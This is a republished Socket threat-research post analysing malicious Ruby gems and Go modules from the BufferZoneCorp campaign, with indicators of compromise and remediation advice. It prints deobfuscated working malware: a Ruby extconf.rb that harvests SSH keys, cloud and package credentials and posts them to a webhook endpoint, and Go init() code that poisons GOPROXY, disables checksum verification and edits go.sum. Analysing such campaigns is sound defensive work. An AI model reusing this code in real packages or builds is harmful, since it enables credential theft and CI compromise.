惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 聂微东
Forbes - Security
Forbes - Security
IT之家
IT之家
P
Privacy International News Feed
宝玉的分享
宝玉的分享
小众软件
小众软件
Google DeepMind News
Google DeepMind News
美团技术团队
G
GRAHAM CLULEY
T
Tor Project blog
Recorded Future
Recorded Future
I
Intezer
C
Cyber Attacks, Cyber Crime and Cyber Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
The Hacker News
The Hacker News
Hugging Face - Blog
Hugging Face - Blog
A
About on SuperTechFans
Scott Helme
Scott Helme
WordPress大学
WordPress大学
F
Full Disclosure
D
Docker
G
Google Developers Blog
C
CXSECURITY Database RSS Feed - CXSecurity.com
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Cyberwarzone
Cyberwarzone
The Last Watchdog
The Last Watchdog
V
V2EX
www.infosecurity-magazine.com
www.infosecurity-magazine.com
NISL@THU
NISL@THU
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Security Latest
Security Latest
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Recent Announcements
Recent Announcements
P
Palo Alto Networks Blog
L
LINUX DO - 热门话题
V
Visual Studio Blog
B
Blog RSS Feed
Microsoft Security Blog
Microsoft Security Blog
博客园 - 叶小钗
N
Netflix TechBlog - Medium
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
量子位
腾讯CDC
H
Heimdal Security Blog
博客园 - 【当耐特】
Simon Willison's Weblog
Simon Willison's Weblog
P
Privacy & Cybersecurity Law Blog
S
Securelist
Vercel News
Vercel News
J
Java Code Geeks

Socket

Large-Scale GitHub Actions Abuse Powers a Distributed cPanel... New Study Identifies 53 Slopsquatting Targets Across 5 Front... White House Launches Gold Eagle Initiative to Manage Surge i... Suno Breached via Shai-Hulud Worm, Leaked Code Exposes AI Mu... Next.js moves to scheduled security releases - Socket 11 Malicious NuGet Tools Pose as Game Cheats to Drop a Windo... Compromised npm Packages in the AsyncAPI Namespace Deliver M... jscrambler npm Package Compromised in Supply Chain Attack - ... Fake Braintree NuGet Package Skims Credit Cards and Harvests... Compromised Injective SDK npm Package Exfiltrates Wallet Key... npm v12 Ships With Install Scripts Off by Default, Begins De... Malicious Go Module Exposes GitHub Malware Lure Network Span... pnpm 11.10 Hardens Registry Authentication to Block Token Re... Coordinated npm and PyPI Campaign Typosquats Popular Secure ... Node.js Considers Public Workflow for Security Reports Amid ... PolinRider: North Korea-Linked Supply Chain Campaign Expands... Risky Biz Podcast: AI Agents Are Raising the Stakes for Soft... Chrome and Firefox Extensions Posing as Free VPNs Add Clipbo... Miasma Mini Shai-Hulud Hits ImmobiliareLabs npm Packages - S... Rolldown Pulls Rust React Compiler Integration After Binary ... Miasma Mini Shai-Hulud Hits LeoPlatform npm Packages and Git... Frontier AI Is Now Critical Infrastructure - Socket The Code You Didn't Write Is Still Yours to Defend - Socket GitHub Actions Checkout Now Blocks Risky pull_request_target... Introducing Repository Access Permissions and Custom Roles -... Socket MCP Adds Org Alerts, Threat Feed Review, and Package ... Socket Firewall Now Blocks Malicious VS Code and Open VSX Ex... 140+ Mastra npm Packages Compromised in Coordinated Supply C... npm Package Uses Prompt Injection and Token Flooding to Disr... Introducing Manifest Alerts - Socket GlassWASM: WebAssembly Malware Found in Trojanized Open VSX ... Socket for Linear Is Now Available - Socket US Government Forces Anthropic to Pull Claude Fable Days After Launch 152 Chrome Live Wallpaper Extensions Hid Ad Tracking and Faked Google Search Traffic Andrew Becherer Joins Socket as Chief Information Security Officer Socket Partners with Replit to Block Malicious Packages in AI-Powered Development npm Tooling Bug Incorrectly Marks One-Character Packages as Security Holders Mini Shai-Hulud, Miasma, and Hades Worms Target Bioinformatics and MCP Developers via Malicious PyPI Wheels Shai-Hulud Descends to Hades: Miasma Worm Campaign Spreads with New PyPI Wave RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems pnpm 11.5 Adds Support for Recognizing npm Staged Publishes pnpm 11.5 Adds Support for Recognizing npm Staged Publishes Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Famous Chollima Targets PHP Developers Through Compromised Packagist Package Famous Chollima Targets PHP Developers Through Compromised Packagist Package Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io Laravel Lang Compromised with RCE Backdoor Across 700+ Versions Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects AI Has Taken Over Open Source npm Invalidates Granular Access Tokens as Mini Shai-Hulud Sweeps the Registry Coruna Respawned: Compromised art-template npm Package Leads to iOS Browser Exploit Kit Socket raises $60M Series C at $1B valuation led by Thrive Capital to secure AI-driven software development Socket Raises $60M Series C at a $1B Valuation to Help Enterprises Build Securely With AI Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor Active Supply Chain Attack Compromises @antv Packages on npm Popular node-ipc npm Package Infected with Credential Stealer TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks Packagist Urges Immediate Composer Update After GitHub Actions Token Leak GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government Socket Named to Rising in Cyber 2026 List of Top Cybersecurity Startups TanStack npm Packages Compromised in Ongoing Mini Shai-Hulud Supply-Chain Attack fsnotify Maintainer Dispute Sparks Supply Chain Concerns Socket Releases Free Certified Patches for Critical vm2 Sandbox Escape 5 Malicious NuGet Packages Impersonate Chinese UI Libraries to Distribute Crypto Wallet and Credential Stealer pnpm 11 Adds Supply Chain Protection Defaults for Minimum Release Age and Exotic Subdependencies PyPI Fixes High-Severity Access Control Issues Found in Security Audit Mini Shai-Hulud Spreads to Packagist: Malicious Intercom PHP Package Follows npm Compromise Intercom’s npm Package Compromised in Ongoing Mini Shai-Hulud Worm Attack lightning PyPI Package Compromised in Supply Chain Attack Malicious npm Package Brand-Squats TanStack to Exfiltrate Environment Variables SAP CAP npm Packages Hit by Supply Chain Attack Socket Has Acquired Secure Annex 73 Open VSX Sleeper Extensions Linked to GlassWorm Show New Malware Activations Introducing Reachability for PHP Introducing Data Exports Malicious Checkmarx Artifacts Found in Official KICS Docker Repository and Code Extensions Introducing Organization Notifications in Socket Introducing Reports: An Extensible Reporting Framework for Socket Data Socket for Jira Is Now Available Socket Named Top Sales Organization by RepVue NIST Officially Stops Enriching Most CVEs as Vulnerability Volume Skyrockets Socket Selected for OpenAI's Cybersecurity Grant Program Feross on the 10 Minutes or Less Podcast: Nobody Reads the Code 108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure Node.js Drops Bug Bounty Rewards After Funding Dries Up The Hidden Blast Radius of the Axios Compromise
Malicious Ruby Gems and Go Modules Impersonate Developer Tools to Steal Secrets and Poison CI
Kirill Boych · 2026-05-01 · via Socket

Sidebar CTA Background

Secure your dependencies with us

Socket proactively blocks malicious open source packages in your code.

Install

We investigated the GitHub account BufferZoneCorp, which published a cluster of repositories linked to malicious Ruby gems and Go modules. The account is part of a software supply chain campaign targeting developers, CI runners, and build environments across two ecosystems.

On the Ruby side, the analyzed gems automate secret theft. They harvest secret-bearing environment variables and read local credential material such as SSH keys, AWS credentials, .npmrc, .netrc, GitHub CLI configuration, and RubyGems credentials, then send the collected data to a hidden exfiltration endpoint.

On the Go side, the campaign is more diverse. Some modules modify GITHUB_ENV, poison GOPROXY, weaken checksum protections, and tamper with go.sum to make downstream dependency resolution easier to intercept or subvert. Other variants plant fake go wrappers in workflow execution paths, manipulate proxy settings, and exfiltrate developer and CI data. In one case, a module appends a hardcoded SSH public key to ~/.ssh/authorized_keys, establishing persistence on the affected host.

We reported all identified malicious gems and modules to the affected registries and submitted a takedown request for the associated GitHub account. Following our report, the Go Security team blocked the malicious Go modules we identified, and we thank them for their swift action. As of this writing, the identified Ruby gems and the GitHub account remain live.

BufferZoneCorp GitHub account hosting a rapidly assembled mix of Ruby and Go repositories.

From GitHub Repositories to Published Packages#

The BufferZoneCorp GitHub account (https://github[.]com/BufferZoneCorp) hosted repositories that mapped directly to published Ruby gems and Go modules.

On the Ruby side, the repositories mapped to the following gems:

  1. knot-activesupport-logger
  2. knot-devise-jwt-helper
  3. knot-rack-session-store
  4. knot-rails-assets-pipeline
  5. knot-rspec-formatter-json
  6. knot-date-utils-rb (sleeper gem; not yet weaponized)
  7. knot-simple-formatter (sleeper gem; not yet weaponized)

RubyGems profile knot-theory tied to the campaign, showing seven published gems and measurable download activity. The published gem names add a knot- prefix to repository names modeled on legitimate Ruby and Rails utilities, preserving close visual and semantic similarity to trusted developer tooling.

On the Go side, the repositories mapped to modules including:

  1. github[.]com/BufferZoneCorp/go-metrics-sdk
  2. github[.]com/BufferZoneCorp/go-weather-sdk
  3. github[.]com/BufferZoneCorp/go-retryablehttp
  4. github[.]com/BufferZoneCorp/go-stdlib-ext
  5. github[.]com/BufferZoneCorp/grpc-client
  6. github[.]com/BufferZoneCorp/net-helper
  7. github[.]com/BufferZoneCorp/config-loader
  8. github[.]com/BufferZoneCorp/log-core (sleeper module; not yet weaponized)
  9. github[.]com/BufferZoneCorp/go-envconfig (sleeper module; not yet weaponized)

A seventeenth repository, go-stdlog, appeared later and had not been pushed to the Go module ecosystem at the time of writing. Even so, its public source already contained malicious reconnaissance logic that runs on import, inventories CI tokens, probes Docker and AWS metadata surfaces, and writes runtime context to logs or local diagnostic files.

The BufferZoneCorp campaign began with sleeper packages: the Ruby gems and Go modules were initially published with plausible utility branding, standard README content, and little or no overtly malicious behavior, then later updated, in almost every case, to add active payloads such as credential exfiltration, GitHub Actions tampering, path hijacking, proxy manipulation, or SSH persistence. Across both ecosystems, the packages impersonate legitimate developer tooling, and in several cases closely track or typosquat real libraries developers know and trust.

Public Go module page for the malicious github[.]com/BufferZoneCorp/go-metrics-sdk, presented as a routine instrumentation library with clean documentation, valid module metadata, and a plausible logrus dependency.

Ruby: Install Time Credential Theft#

One of the Ruby samples in the cluster (knot-activesupport-logger), claims to be a helper for Rails or ActiveSupport logging, but its real value to the threat actor is secret collection.

The gem contains two malicious paths. The first is install time execution through extconf.rb. RubyGems treats extconf.rb as part of the native extension build process, so this file runs automatically during installation. The second is a runtime path wired into the custom logger itself, which sends environment data the first time the logger is used.

The install time path is the most consequential because it can run before a user ever explicitly invokes the advertised package functionality. In the sample we analyzed, the code filters environment variables for keywords such as token, key, secret, pass, aws, github, api, and auth. It then reads from common developer credential paths, including ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.aws/credentials, ~/.npmrc, ~/.gem/credentials, ~/.netrc, ~/.config/gh/hosts.yml, and ~/.gitconfig. The results are encoded as JSON and sent to a hidden remote endpoint.

Here and below, the code snippets are taken directly from the analyzed packages. We deobfuscated the samples where needed and added inline comments to highlight the code’s functionality and malicious intent.

require 'mkmf'      # install-time execution hook
require 'net/http'  # HTTP exfiltration
require 'json'      # JSON encoding
require 'uri'
require 'fileutils' # unused here; likely cover or prep
require 'socket'    # hostname collection
require 'base64'    # endpoint obfuscation

def _r(p)
  # Read up to 4 KB from a file in the user's home directory
  File.read(File.join(Dir.home, p)).slice(0, 4096)
rescue
  nil # suppress read errors
end

_ep = ENV['PKG_ANALYTICS_URL'] ||
      Base64.decode64(
        'aHR0cHM6Ly93ZWJob29rLnNpdGUvNDljMjE4NDMtYzI3Yy00YTFiLWIxZjYtMDM3YzM5OTgwNTVm'
      )
# Hidden exfil endpoint, overrideable at runtime
# Decodes to: https://webhook[.]site/49c21843-c27c-4a1b-b1f6-037c3998055f

_keys = %w[token key secret pass npm aws github stripe database api auth]
# Keywords used to select secret-bearing environment variables

_env = ENV.select { |k, _| _keys.any? { |s| k.downcase.include?(s) } }
# Collect environment variables likely to hold credentials or tokens

_data = {
  ts: Time.now.to_i,
  h: Socket.gethostname, # hostname
  u: ENV['USER'],        # username
  p: RUBY_PLATFORM,      # platform
  ci: !!ENV['CI'],       # CI marker
  phase: 'install',
  env: _env,             # selected environment secrets
  f: {
    rsa:    _r('.ssh/id_rsa'),          # SSH private key
    ed:     _r('.ssh/id_ed25519'),      # SSH private key
    aws:    _r('.aws/credentials'),     # AWS credentials
    npmrc:  _r('.npmrc'),               # npm credentials
    gem:    _r('.gem/credentials'),     # RubyGems credentials
    netrc:  _r('.netrc'),               # machine credentials
    gh:     _r('.config/gh/hosts.yml'), # GitHub CLI auth data
    gitcfg: _r('.gitconfig'),           # Git config and helper data
  }
}

begin
  _uri  = URI.parse(_ep)
  _http = Net::HTTP.new(_uri.host, _uri.port)
  _http.use_ssl      = _uri.scheme == 'https'
  _http.open_timeout = 3
  _req  = Net::HTTP::Post.new(_uri.path.empty? ? '/' : _uri.path)
  _req['Content-Type'] = 'application/json'
  _req['X-Pkg-Id']     = 'activesupport-logger-install'
  _req.body = _data.to_json
  _http.request(_req) # exfiltrates harvested data during install
rescue
  nil # suppress network errors
end

create_makefile('activesupport_logger_ext')
# Forces RubyGems to run extconf.rb during installation

In a controlled lab test, we redirected PKG_ANALYTICS_URL to a local collector and confirmed that installation triggered an outbound JSON POST containing host metadata and test secrets we intentionally placed in the environment. The gem also includes a runtime exfiltration path. On the first log write, it spawns a background thread that collects secret-bearing environment variables and sends them to the same endpoint.

Socket AI Scanner’s analysis of the malicious knot-activesupport-logger gem highlights install-time credential theft implemented in ext/extconf.rb, where the gem harvests secret-bearing environment variables, reads developer credential files from the user’s home directory, and exfiltrates the collected data to an external HTTPS endpoint while suppressing errors to reduce detection and avoid breaking installation.

Go: One Cluster, Several Distinct Payloads#

The Go modules tied to BufferZoneCorp are related, but they do not all have the same payload. Instead, they follow a common pattern: automatic execution through init(), targeting of GitHub Actions or other CI environments, behavior inconsistent with the module’s claimed purpose, and shared infrastructure or control mechanisms.

Dependency Poisoning in GitHub Actions#

github[.]com/BufferZoneCorp/go-metrics-sdk disguises its malicious behavior inside exporter.go, where the module executes automatically through init(). Its core objective is to tamper with Go module trust settings in GitHub Actions.

The sample detects GITHUB_ENV, decodes a hidden endpoint or takes one from PKG_ANALYTICS_URL, removes selected dependency lines from go.sum, and appends poisoned environment settings to the workflow environment. Those settings include GOPROXY, GOSUMDB=off, GONOSUMDB=*, GOFLAGS=-mod=mod, and a custom GOMODCACHE path.

The key behavior is visible in the following excerpt.

package metrics

import (
	"fmt"
	"os"
	"strconv"
	"strings"
)

var _peers = []string{
	"104.116.116.112",
	"115.58.47.47",
	"119.101.98.104",
	"111.111.107.46",
	"115.105.116.101",
	"47.52.57.99",
	"50.49.56.52",
	"51.45.99.50",
	"55.99.45.52",
	"97.49.98.45",
	"98.49.102.54",
	"45.48.51.55",
	"99.51.57.57",
	"56.48.53.53",
	"102.0.0.0",
}
// Hidden endpoint encoded as decimal byte fragments
// Decodes to: https://webhook[.]site/49c21843-c27c-4a1b-b1f6-037c3998055f

func _env(a, b string) string { return os.Getenv(a + b) }

// Rebuilds "GITHUB_ENV" from fragments to evade simple string matching

func _j(ss ...string) string {
	var b strings.Builder
	for _, s := range ss {
		b.WriteString(s)
	}
	return b.String()
}

// Joins suspicious strings from fragments

func _resolve(peers []string) string {
	var out []byte
	for _, p := range peers {
		for _, part := range strings.Split(p, ".") {
			if n, err := strconv.Atoi(part); err == nil && n > 0 {
				out = append(out, byte(n))
			}
		}
	}
	return string(out)
}

// Decodes the hidden endpoint

func init() {
	_syncRegistry()
}

// Runs automatically when the module initializes

func _syncRegistry() {
	envFile := _env("GITHUB", "_ENV")
	if envFile == "" {
		return
	}
	// Only runs in GitHub Actions

	tb := _resolve(_peers)
	if v := os.Getenv("PKG_ANALYTICS_URL"); v != "" {
		tb = v
	}
	// Allows the endpoint to be overridden at runtime

	sumPath := "go.sum"
	if data, err := os.ReadFile(sumPath); err == nil {
		needle := _j("github.com", "/sirupsen", "/logrus")
		var keep []string
		for _, line := range strings.Split(string(data), "\n") {
			if !strings.Contains(line, needle) {
				keep = append(keep, line)
			}
		}
		os.WriteFile(sumPath, []byte(strings.Join(keep, "\n")), 0644)
	}
	// Removes logrus checksums from go.sum

	f, err := os.OpenFile(envFile, os.O_APPEND|os.O_WRONLY, 0600)
	if err != nil {
		return
	}
	defer f.Close()

	fmt.Fprintf(f, _j("GOP", "ROX", "Y=%s|direct\n"), tb)
	// Repoints GOPROXY to the hidden or overridden endpoint

	fmt.Fprintln(f, _j("GOS", "UMDB=off"))
	// Disables checksum database verification

	fmt.Fprintln(f, _j("GON", "OSU", "MDB=*"))
	// Skips checksum verification for all modules

	fmt.Fprintln(f, _j("GOF", "LAGS=-mod=mod"))
	// Forces module resolution behavior

	fmt.Fprintln(f, _j("GOMOD", "CACHE=/tmp/.go", "mod-cache"))
	// Redirects the module cache to a temp path
}

This module interferes with how a GitHub Actions workflow fetches and trusts Go dependencies. It changes download and verification settings, weakens checksum protections, and edits go.sum to help force dependency re-resolution through threat actor-controlled settings. The goal is to make later workflow steps trust Go’s built-in safeguards less and threat actor-supplied settings more.

Proxy Manipulation and a Fake go Wrapper#

github[.]com/BufferZoneCorp/go-retryablehttp belongs to the same campaign, but it uses a different technique. Instead of targeting Go checksum and trust settings directly, it sets up path and proxy interception for later workflow steps.

The module executes through init(), detects GITHUB_ENV and GITHUB_PATH, sets HTTP_PROXY and HTTPS_PROXY, writes a fake go executable into a cache directory, and appends that directory to the workflow path so the wrapper is selected before the real binary. That wrapper can then intercept or influence later go executions while still passing control to the legitimate binary to avoid breaking the job.

This variant gives the threat actor a different foothold in CI. github[.]com/BufferZoneCorp/go-metrics-sdk tampers with dependency trust settings directly. github[.]com/BufferZoneCorp/go-retryablehttp instead hijacks process routing and network flow inside the build environment.

Credential Theft, SSH Persistence, and Workflow Tampering#

github[.]com/BufferZoneCorp/go-stdlib-ext executes automatically from init(). It launches a background goroutine, pauses briefly, and then calls functions that exfiltrate data, establish persistence, and alter the runtime environment.

The module reads from local credential files such as ~/.npmrc, ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.aws/credentials, ~/.config/gh/hosts.yml, ~/.docker/config.json, ~/.kube/config, and ~/.netrc. It also harvests environment data, and POSTs the results to the campaign’s collection endpoint. If exfiltration succeeds, it appends a hardcoded SSH public key tagged deploy@buildserver to ~/.ssh/authorized_keys.

That behavior moves the sample beyond credential theft and into persistence. If the threat actor controls the corresponding private key, the inserted public key can provide future SSH access to the host.

The sample also targets GitHub Actions. It writes no sum settings to the workflow environment and plants another fake go wrapper in the execution path. That wrapper sends go invocation arguments to the collection endpoint, then passes control to the real Go binary.

Outlook and Recommendations#

This cluster will likely continue to evolve even if individual packages are removed. The campaign already shifted from sleeper packages to active payloads and then added new repository staging. Defenders should expect follow-on packages that reuse a similar playbook: plausible utility branding, automatic execution paths, CI targeting, secret collection, path hijacking, and persistence.

If affected by this campaign, remove all BufferZoneCorp Ruby gems and Go modules, then review developer systems and CI workflows for evidence of installation or execution.

In Ruby environments, search for the knot-* gems tied to this cluster and inspect hosts for access to sensitive files such as ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.aws/credentials, ~/.gem/credentials, ~/.netrc, ~/.config/gh/hosts.yml, and ~/.gitconfig. If any affected gem was installed, rotate exposed credentials and review network logs for outbound HTTPS traffic to the identified collection endpoint.

In Go environments, search source repositories, build logs, and dependency manifests for github[.]com/BufferZoneCorp/. Review workflows for unauthorized changes to GITHUB_ENV, GITHUB_PATH, GOPROXY, GOSUMDB, GONOSUMDB, GOFLAGS, GOMODCACHE, or go.sum. Look for fake go wrappers in cache or utility directories and inspect ~/.ssh/authorized_keys for unauthorized key insertion, including the deploy@buildserver marker.

In GitHub Actions, review logs for runner inventory output, token presence checks, Docker socket probing, AWS metadata probing, unexpected writes to stderr, and references to temporary diagnostic files. If a workflow imported or executed one of these modules, treat runner secrets, cloud credentials, package publishing tokens, and build outputs as potentially exposed.

To reduce repeat exposure, add review gates for newly introduced developer utilities, and limit secret scope in CI so build jobs do not inherit credentials they do not need.

Indicators of Compromise#

Threat actor aliases

  • BufferZoneCorp — GitHub username
  • knot-theory — RubyGems username

SSH public key

  • ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBp9VZGMxqFpTwKbKJi7dS2mNrX3LqEoHcYsWfAkZvUt deploy@buildserver

GitHub repositories

  1. github[.]com/BufferZoneCorp/activesupport-logger
  2. github[.]com/BufferZoneCorp/devise-jwt-helper
  3. github[.]com/BufferZoneCorp/rack-session-store
  4. github[.]com/BufferZoneCorp/rails-assets-pipeline
  5. github[.]com/BufferZoneCorp/rspec-formatter-json
  6. github[.]com/BufferZoneCorp/date-utils-rb
  7. github[.]com/BufferZoneCorp/simple-formatter
  8. github[.]com/BufferZoneCorp/go-metrics-sdk
  9. github[.]com/BufferZoneCorp/go-weather-sdk
  10. github[.]com/BufferZoneCorp/go-retryablehttp
  11. github[.]com/BufferZoneCorp/go-stdlib-ext
  12. github[.]com/BufferZoneCorp/grpc-client
  13. github[.]com/BufferZoneCorp/net-helper
  14. github[.]com/BufferZoneCorp/config-loader
  15. github[.]com/BufferZoneCorp/log-core
  16. github[.]com/BufferZoneCorp/go-envconfig
  17. github[.]com/BufferZoneCorp/go-stdlog

Ruby gems

  1. knot-activesupport-logger
  2. knot-devise-jwt-helper
  3. knot-rack-session-store
  4. knot-rails-assets-pipeline
  5. knot-rspec-formatter-json
  6. knot-date-utils-rb
  7. knot-simple-formatter

Go modules

  1. github[.]com/BufferZoneCorp/go-metrics-sdk
  2. github[.]com/BufferZoneCorp/go-weather-sdk
  3. github[.]com/BufferZoneCorp/go-retryablehttp
  4. github[.]com/BufferZoneCorp/go-stdlib-ext
  5. github[.]com/BufferZoneCorp/grpc-client
  6. github[.]com/BufferZoneCorp/net-helper
  7. github[.]com/BufferZoneCorp/config-loader
  8. github[.]com/BufferZoneCorp/log-core
  9. github[.]com/BufferZoneCorp/go-envconfig

Exfiltration endpoint

  • hxxps://webhook[.]site/49c21843-c27c-4a1b-b1f6-037c3998055f

MITRE ATT&CK#

  • T1195.001 — Supply Chain Compromise: Compromise Software Dependencies and Development Tools
  • T1204.005 — User Execution: Malicious Library
  • T1036.005 — Masquerading: Match Legitimate Resource Name or Location
  • T1059.004 — Command and Scripting Interpreter: Unix Shell
  • T1552.001 — Unsecured Credentials: Credentials in Files
  • T1552.004 — Unsecured Credentials: Private Keys
  • T1552.005 — Unsecured Credentials: Cloud Instance Metadata API
  • T1098.004 — Account Manipulation: SSH Authorized Keys
  • T1574.007 — Hijack Execution Flow: Path Interception by PATH Environment Variable
  • T1567.004 — Exfiltration Over Web Service: Exfiltration Over Webhook
  • T1082 — System Information Discovery
  • T1083 — File and Directory Discovery
  • T1526 — Cloud Service Discovery
  • T1613 — Container and Resource Discovery